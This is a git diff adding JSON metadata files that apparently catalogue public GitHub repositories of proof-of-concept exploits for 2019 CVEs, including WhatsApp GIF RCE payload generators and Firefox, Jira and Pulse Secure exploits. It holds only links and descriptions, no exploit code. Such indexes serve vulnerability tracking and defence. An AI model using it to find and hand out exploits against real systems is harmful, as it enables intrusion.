+ { + "id": 577662602, + "name": "APT-Backpack", + "full_name": "34zY\/APT-Backpack", + "owner": { + "login": "34zY", + "id": 55347142, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55347142?v=4", + "html_url": "https:\/\/github.com\/34zY", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/34zY\/APT-Backpack", + "description": "cve-2019-11510, cve-2019-19781, cve-2020-5902,               cve-2021-1497, cve-2021-20090, cve-2021-22006, cve-2021-22205, cve-2021-26084, cve-2021-26855, cve-2021-26857, cve-2021–26857, cve-2021–26858, cve-2021–26865", + "fork": false, + "created_at": "2022-12-13T08:41:44Z", + "updated_at": "2024-11-05T01:37:50Z", + "pushed_at": "2023-04-19T17:10:15Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-11523.json b/2019/CVE-2019-11523.json new file mode 100644 index 0000000000..1b26bc7a56 --- /dev/null +++ b/2019/CVE-2019-11523.json @@ -0,0 +1,37 @@ +[ + { + "id": 182799429, + "name": "anviz-m3-rfid-cve-2019-11523-poc", + "full_name": "wizlab-it\/anviz-m3-rfid-cve-2019-11523-poc", + "owner": { + "login": "wizlab-it", + "id": 19650583, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19650583?v=4", + "html_url": "https:\/\/github.com\/wizlab-it", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wizlab-it\/anviz-m3-rfid-cve-2019-11523-poc", + "description": "Anviz M3 RFID CVE-2019-11523 PoC", + "fork": false, + "created_at": "2019-04-22T14:00:50Z", + "updated_at": "2024-08-12T19:48:09Z", + "pushed_at": "2019-06-13T16:23:07Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "anviz", + "m3", + "rfid" + ], + "visibility": "public", + "forks": 5, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-11539.json b/2019/CVE-2019-11539.json new file mode 100644 index 0000000000..b927c381b1 --- /dev/null +++ b/2019/CVE-2019-11539.json @@ -0,0 +1,35 @@ +[ + { + "id": 206321288, + "name": "CVE-2019-11539", + "full_name": "0xDezzy\/CVE-2019-11539", + "owner": { + "login": "0xDezzy", + "id": 4141697, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4141697?v=4", + "html_url": "https:\/\/github.com\/0xDezzy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xDezzy\/CVE-2019-11539", + "description": "Exploit for the Post-Auth RCE vulnerability in Pulse Secure Connect", + "fork": false, + "created_at": "2019-09-04T13:06:02Z", + "updated_at": "2024-08-12T19:52:39Z", + "pushed_at": "2022-02-11T00:00:44Z", + "stargazers_count": 131, + "watchers_count": 131, + "has_discussions": false, + "forks_count": 35, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "vpn-appliance" + ], + "visibility": "public", + "forks": 35, + "watchers": 131, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-11580.json b/2019/CVE-2019-11580.json new file mode 100644 index 0000000000..48ebe0f9b4 --- /dev/null +++ b/2019/CVE-2019-11580.json @@ -0,0 +1,68 @@ +[ + { + "id": 197342430, + "name": "CVE-2019-11580", + "full_name": "jas502n\/CVE-2019-11580", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2019-11580", + "description": "CVE-2019-11580 Atlassian Crowd and Crowd Data Center RCE", + "fork": false, + "created_at": "2019-07-17T07:54:38Z", + "updated_at": "2024-08-12T19:51:08Z", + "pushed_at": "2019-07-18T10:03:28Z", + "stargazers_count": 105, + "watchers_count": 105, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 105, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 245476096, + "name": "CVE-2019-11580", + "full_name": "shelld3v\/CVE-2019-11580", + "owner": { + "login": "shelld3v", + "id": 59408894, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59408894?v=4", + "html_url": "https:\/\/github.com\/shelld3v", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shelld3v\/CVE-2019-11580", + "description": "A CVE-2019-11580 shell", + "fork": false, + "created_at": "2020-03-06T17:09:26Z", + "updated_at": "2024-08-12T19:58:26Z", + "pushed_at": "2020-04-10T05:12:50Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-11580", + "exploitation", + "shell" + ], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-11581.json b/2019/CVE-2019-11581.json new file mode 100644 index 0000000000..1a5973a2b3 --- /dev/null +++ b/2019/CVE-2019-11581.json @@ -0,0 +1,95 @@ +[ + { + "id": 197105656, + "name": "CVE-2019-11581", + "full_name": "jas502n\/CVE-2019-11581", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2019-11581", + "description": "Atlassian JIRA Template injection vulnerability RCE", + "fork": false, + "created_at": "2019-07-16T02:27:00Z", + "updated_at": "2024-08-12T19:51:06Z", + "pushed_at": "2019-07-22T06:47:52Z", + "stargazers_count": 93, + "watchers_count": 93, + "has_discussions": false, + "forks_count": 30, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 30, + "watchers": 93, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 198763431, + "name": "CVE-2019-11581", + "full_name": "kobs0N\/CVE-2019-11581", + "owner": { + "login": "kobs0N", + "id": 23138815, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23138815?v=4", + "html_url": "https:\/\/github.com\/kobs0N", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kobs0N\/CVE-2019-11581", + "description": "CVE-2019–11581 PoC", + "fork": false, + "created_at": "2019-07-25T05:29:23Z", + "updated_at": "2024-08-12T19:51:22Z", + "pushed_at": "2019-12-13T13:03:39Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 364161354, + "name": "CVE-2019-11581", + "full_name": "PetrusViet\/CVE-2019-11581", + "owner": { + "login": "PetrusViet", + "id": 63145078, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63145078?v=4", + "html_url": "https:\/\/github.com\/PetrusViet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PetrusViet\/CVE-2019-11581", + "description": "Atlassian Jira unauthen template injection", + "fork": false, + "created_at": "2021-05-04T06:30:47Z", + "updated_at": "2024-08-12T20:12:42Z", + "pushed_at": "2021-11-29T14:26:48Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-11687.json b/2019/CVE-2019-11687.json new file mode 100644 index 0000000000..8c3457f94e --- /dev/null +++ b/2019/CVE-2019-11687.json @@ -0,0 +1,33 @@ +[ + { + "id": 228155281, + "name": "bad-dicom", + "full_name": "kosmokato\/bad-dicom", + "owner": { + "login": "kosmokato", + "id": 58893728, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58893728?v=4", + "html_url": "https:\/\/github.com\/kosmokato", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kosmokato\/bad-dicom", + "description": "Explotation framework for CVE-2019-11687", + "fork": false, + "created_at": "2019-12-15T08:52:17Z", + "updated_at": "2024-08-12T19:55:44Z", + "pushed_at": "2021-05-16T13:16:34Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-11707.json b/2019/CVE-2019-11707.json new file mode 100644 index 0000000000..171ee1d8f6 --- /dev/null +++ b/2019/CVE-2019-11707.json @@ -0,0 +1,64 @@ +[ + { + "id": 202974494, + "name": "CVE-2019-11707", + "full_name": "vigneshsrao\/CVE-2019-11707", + "owner": { + "login": "vigneshsrao", + "id": 20860267, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20860267?v=4", + "html_url": "https:\/\/github.com\/vigneshsrao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vigneshsrao\/CVE-2019-11707", + "description": "Exploit code for CVE-2019-11707 on Firefox 66.0.3 running on Ubuntu ", + "fork": false, + "created_at": "2019-08-18T07:41:01Z", + "updated_at": "2024-08-12T19:52:06Z", + "pushed_at": "2019-08-18T07:42:36Z", + "stargazers_count": 42, + "watchers_count": 42, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 42, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 255362000, + "name": "cve-2019-11707", + "full_name": "flabbergastedbd\/cve-2019-11707", + "owner": { + "login": "flabbergastedbd", + "id": 2751016, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2751016?v=4", + "html_url": "https:\/\/github.com\/flabbergastedbd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/flabbergastedbd\/cve-2019-11707", + "description": "https:\/\/bugs.chromium.org\/p\/project-zero\/issues\/detail?id=1820", + "fork": false, + "created_at": "2020-04-13T15:11:46Z", + "updated_at": "2023-09-28T11:14:00Z", + "pushed_at": "2020-04-14T03:47:59Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-11708.json b/2019/CVE-2019-11708.json new file mode 100644 index 0000000000..48ae9e6b4a --- /dev/null +++ b/2019/CVE-2019-11708.json @@ -0,0 +1,41 @@ +[ + { + "id": 211619802, + "name": "CVE-2019-11708", + "full_name": "0vercl0k\/CVE-2019-11708", + "owner": { + "login": "0vercl0k", + "id": 1476421, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1476421?v=4", + "html_url": "https:\/\/github.com\/0vercl0k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0vercl0k\/CVE-2019-11708", + "description": "Full exploit chain (CVE-2019-11708 & CVE-2019-9810) against Firefox on Windows 64-bit.", + "fork": false, + "created_at": "2019-09-29T07:08:52Z", + "updated_at": "2024-11-22T15:14:44Z", + "pushed_at": "2020-06-13T17:40:14Z", + "stargazers_count": 620, + "watchers_count": 620, + "has_discussions": false, + "forks_count": 81, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-11708", + "cve-2019-9810", + "exploit", + "exploitation", + "firefox", + "remote-code-execution", + "sandbox-escape" + ], + "visibility": "public", + "forks": 81, + "watchers": 620, + "score": 0, + "subscribers_count": 19 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-11730.json b/2019/CVE-2019-11730.json new file mode 100644 index 0000000000..99df9a127d --- /dev/null +++ b/2019/CVE-2019-11730.json @@ -0,0 +1,33 @@ +[ + { + "id": 248166516, + "name": "CVE-2019-11730", + "full_name": "lihuaiqiu\/CVE-2019-11730", + "owner": { + "login": "lihuaiqiu", + "id": 51249934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51249934?v=4", + "html_url": "https:\/\/github.com\/lihuaiqiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lihuaiqiu\/CVE-2019-11730", + "description": null, + "fork": false, + "created_at": "2020-03-18T07:34:18Z", + "updated_at": "2020-03-18T07:34:19Z", + "pushed_at": "2019-12-22T19:18:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1181.json b/2019/CVE-2019-1181.json new file mode 100644 index 0000000000..5afe5fba19 --- /dev/null +++ b/2019/CVE-2019-1181.json @@ -0,0 +1,33 @@ +[ + { + "id": 202264461, + "name": "cve-2019-1181", + "full_name": "major203\/cve-2019-1181", + "owner": { + "login": "major203", + "id": 7425945, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7425945?v=4", + "html_url": "https:\/\/github.com\/major203", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/major203\/cve-2019-1181", + "description": null, + "fork": false, + "created_at": "2019-08-14T03:07:02Z", + "updated_at": "2019-08-14T03:07:02Z", + "pushed_at": "2019-08-14T03:07:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 8 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-11869.json b/2019/CVE-2019-11869.json new file mode 100644 index 0000000000..52335d21f7 --- /dev/null +++ b/2019/CVE-2019-11869.json @@ -0,0 +1,64 @@ +[ + { + "id": 888188228, + "name": "CVE-2019-11869", + "full_name": "rix4uni\/CVE-2019-11869", + "owner": { + "login": "rix4uni", + "id": 72344025, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72344025?v=4", + "html_url": "https:\/\/github.com\/rix4uni", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rix4uni\/CVE-2019-11869", + "description": null, + "fork": false, + "created_at": "2024-11-14T00:56:40Z", + "updated_at": "2024-11-14T01:02:01Z", + "pushed_at": "2024-11-14T01:01:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 888188615, + "name": "CVE-2019-11869", + "full_name": "gitrecon1455\/CVE-2019-11869", + "owner": { + "login": "gitrecon1455", + "id": 124584468, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124584468?v=4", + "html_url": "https:\/\/github.com\/gitrecon1455", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gitrecon1455\/CVE-2019-11869", + "description": null, + "fork": false, + "created_at": "2024-11-14T00:57:57Z", + "updated_at": "2024-11-14T00:58:13Z", + "pushed_at": "2024-11-14T00:58:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-11881.json b/2019/CVE-2019-11881.json new file mode 100644 index 0000000000..4ad9570d09 --- /dev/null +++ b/2019/CVE-2019-11881.json @@ -0,0 +1,42 @@ +[ + { + "id": 188323560, + "name": "VanCleef", + "full_name": "MauroEldritch\/VanCleef", + "owner": { + "login": "MauroEldritch", + "id": 1292978, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1292978?v=4", + "html_url": "https:\/\/github.com\/MauroEldritch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MauroEldritch\/VanCleef", + "description": "Exploit for CVE-2019-11881 (Rancher 2.1.4 Web Parameter Tampering)", + "fork": false, + "created_at": "2019-05-24T00:09:21Z", + "updated_at": "2024-08-12T19:49:14Z", + "pushed_at": "2019-06-10T22:10:10Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "container", + "cve-2019-11881", + "docker", + "exploit", + "kubernetes", + "poc", + "rancher", + "ruby" + ], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-11931.json b/2019/CVE-2019-11931.json new file mode 100644 index 0000000000..236a5257bd --- /dev/null +++ b/2019/CVE-2019-11931.json @@ -0,0 +1,64 @@ +[ + { + "id": 222086842, + "name": "whatsapp-rce-patched", + "full_name": "kasif-dekel\/whatsapp-rce-patched", + "owner": { + "login": "kasif-dekel", + "id": 5827021, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5827021?v=4", + "html_url": "https:\/\/github.com\/kasif-dekel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kasif-dekel\/whatsapp-rce-patched", + "description": "cve-2019-11931", + "fork": false, + "created_at": "2019-11-16T11:06:52Z", + "updated_at": "2024-08-12T19:54:54Z", + "pushed_at": "2019-11-16T11:15:06Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 35, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 223598650, + "name": "CVE-2019-11931", + "full_name": "nop-team\/CVE-2019-11931", + "owner": { + "login": "nop-team", + "id": 58111818, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58111818?v=4", + "html_url": "https:\/\/github.com\/nop-team", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nop-team\/CVE-2019-11931", + "description": null, + "fork": false, + "created_at": "2019-11-23T14:06:13Z", + "updated_at": "2024-08-12T19:55:07Z", + "pushed_at": "2019-11-23T14:06:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-11932.json b/2019/CVE-2019-11932.json new file mode 100644 index 0000000000..9c8a347d3f --- /dev/null +++ b/2019/CVE-2019-11932.json @@ -0,0 +1,669 @@ +[ + { + "id": 212541592, + "name": "CVE-2019-11932", + "full_name": "dorkerdevil\/CVE-2019-11932", + "owner": { + "login": "dorkerdevil", + "id": 15796745, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15796745?v=4", + "html_url": "https:\/\/github.com\/dorkerdevil", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dorkerdevil\/CVE-2019-11932", + "description": " double-free bug in WhatsApp exploit poc", + "fork": false, + "created_at": "2019-10-03T09:26:24Z", + "updated_at": "2024-10-12T20:37:42Z", + "pushed_at": "2021-03-19T17:23:25Z", + "stargazers_count": 269, + "watchers_count": 269, + "has_discussions": false, + "forks_count": 77, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 77, + "watchers": 269, + "score": 0, + "subscribers_count": 16 + }, + { + "id": 212837105, + "name": "CVE-2019-11932", + "full_name": "awakened1712\/CVE-2019-11932", + "owner": { + "login": "awakened1712", + "id": 628212, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/628212?v=4", + "html_url": "https:\/\/github.com\/awakened1712", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/awakened1712\/CVE-2019-11932", + "description": "Simple POC for exploiting WhatsApp double-free bug in DDGifSlurp in decoding.c in libpl_droidsonroids_gif", + "fork": false, + "created_at": "2019-10-04T14:43:57Z", + "updated_at": "2024-11-14T02:43:03Z", + "pushed_at": "2019-11-30T10:28:01Z", + "stargazers_count": 200, + "watchers_count": 200, + "has_discussions": false, + "forks_count": 105, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 105, + "watchers": 200, + "score": 0, + "subscribers_count": 10 + }, + { + "id": 212845397, + "name": "WhatsRCE", + "full_name": "JasonJerry\/WhatsRCE", + "owner": { + "login": "JasonJerry", + "id": 40905631, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40905631?v=4", + "html_url": "https:\/\/github.com\/JasonJerry", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JasonJerry\/WhatsRCE", + "description": "This is a Automated Generate Payload for CVE-2019-11932 (WhatsApp Remote Code Execution)", + "fork": false, + "created_at": "2019-10-04T15:19:41Z", + "updated_at": "2024-09-14T08:58:24Z", + "pushed_at": "2019-10-04T14:43:37Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 36, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 36, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 212954402, + "name": "CVE-2019-11932", + "full_name": "TulungagungCyberLink\/CVE-2019-11932", + "owner": { + "login": "TulungagungCyberLink", + "id": 46483873, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46483873?v=4", + "html_url": "https:\/\/github.com\/TulungagungCyberLink", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TulungagungCyberLink\/CVE-2019-11932", + "description": "Double-Free BUG in WhatsApp exploit poc.", + "fork": false, + "created_at": "2019-10-05T06:24:08Z", + "updated_at": "2023-02-03T09:00:19Z", + "pushed_at": "2019-10-08T06:17:40Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-11932", + "proofofconcept", + "tulungagungcyberlink", + "whatsapp-exploit", + "whatsapp-rce" + ], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 213187543, + "name": "CVE-2019-11932", + "full_name": "infiniteLoopers\/CVE-2019-11932", + "owner": { + "login": "infiniteLoopers", + "id": 27885817, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27885817?v=4", + "html_url": "https:\/\/github.com\/infiniteLoopers", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/infiniteLoopers\/CVE-2019-11932", + "description": null, + "fork": false, + "created_at": "2019-10-06T14:54:35Z", + "updated_at": "2022-06-01T18:02:34Z", + "pushed_at": "2019-10-06T15:34:22Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 215516489, + "name": "CVE-2019-11932-SupportApp", + "full_name": "valbrux\/CVE-2019-11932-SupportApp", + "owner": { + "login": "valbrux", + "id": 20357515, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20357515?v=4", + "html_url": "https:\/\/github.com\/valbrux", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/valbrux\/CVE-2019-11932-SupportApp", + "description": "This native code file aims to be complementary to the published Whatsapp GIF RCE exploit by Awakened , by calculating the system() function address and ROP gadget address for different types of devices, which then can be used to successfully exploit the vulnerability. ", + "fork": false, + "created_at": "2019-10-16T10:04:30Z", + "updated_at": "2024-08-12T19:53:57Z", + "pushed_at": "2019-10-16T12:20:53Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 23, + "watchers": 36, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 215635890, + "name": "CVE-2019-11932", + "full_name": "fastmo\/CVE-2019-11932", + "owner": { + "login": "fastmo", + "id": 53575270, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53575270?v=4", + "html_url": "https:\/\/github.com\/fastmo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fastmo\/CVE-2019-11932", + "description": "Programa para hackear Whatsapp Mediante Gif ,asiendo un exploit con el puerto.", + "fork": false, + "created_at": "2019-10-16T20:13:23Z", + "updated_at": "2024-10-15T10:43:22Z", + "pushed_at": "2021-06-16T16:49:33Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 11, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 217001772, + "name": "CVE-2019-11932-whatsApp-exploit", + "full_name": "mRanonyMousTZ\/CVE-2019-11932-whatsApp-exploit", + "owner": { + "login": "mRanonyMousTZ", + "id": 38766899, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38766899?v=4", + "html_url": "https:\/\/github.com\/mRanonyMousTZ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mRanonyMousTZ\/CVE-2019-11932-whatsApp-exploit", + "description": "Double-free vulnerability in DDGifSlurp in decoding.c in libpl_droidsonroids_gif can read more https:\/\/awakened1712.github.io\/hacking\/hacking-whatsapp-gif-rce\/", + "fork": false, + "created_at": "2019-10-23T08:02:15Z", + "updated_at": "2024-08-12T19:54:10Z", + "pushed_at": "2019-10-23T08:25:48Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 15, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 228222453, + "name": "CVE-2019-11932", + "full_name": "SmoZy92\/CVE-2019-11932", + "owner": { + "login": "SmoZy92", + "id": 58377338, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58377338?v=4", + "html_url": "https:\/\/github.com\/SmoZy92", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SmoZy92\/CVE-2019-11932", + "description": null, + "fork": false, + "created_at": "2019-12-15T17:21:26Z", + "updated_at": "2020-09-02T11:23:41Z", + "pushed_at": "2019-12-15T17:40:15Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 239654888, + "name": "https-github.com-awakened171", + "full_name": "dashtic172\/https-github.com-awakened171", + "owner": { + "login": "dashtic172", + "id": 60906735, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60906735?v=4", + "html_url": "https:\/\/github.com\/dashtic172", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dashtic172\/https-github.com-awakened171", + "description": "https:\/\/github.com\/awakened1712\/CVE-2019-11932", + "fork": false, + "created_at": "2020-02-11T02:00:14Z", + "updated_at": "2020-02-11T02:00:14Z", + "pushed_at": "2020-02-11T02:00:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 258020988, + "name": "WhatsPayloadRCE", + "full_name": "Err0r-ICA\/WhatsPayloadRCE", + "owner": { + "login": "Err0r-ICA", + "id": 59941931, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59941931?v=4", + "html_url": "https:\/\/github.com\/Err0r-ICA", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Err0r-ICA\/WhatsPayloadRCE", + "description": "Whatsapp Automatic Payload Generator [CVE-2019-11932]", + "fork": false, + "created_at": "2020-04-22T21:11:27Z", + "updated_at": "2024-09-21T18:21:59Z", + "pushed_at": "2022-01-02T20:40:58Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exploit", + "hacking", + "hacking-tools", + "linux", + "payload", + "termux", + "whatsapp", + "whatsapp-chat" + ], + "visibility": "public", + "forks": 10, + "watchers": 31, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 288889170, + "name": "CVE-2019-11932-SupportApp", + "full_name": "starling021\/CVE-2019-11932-SupportApp", + "owner": { + "login": "starling021", + "id": 69880426, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69880426?v=4", + "html_url": "https:\/\/github.com\/starling021", + "user_view_type": "public" + }, + 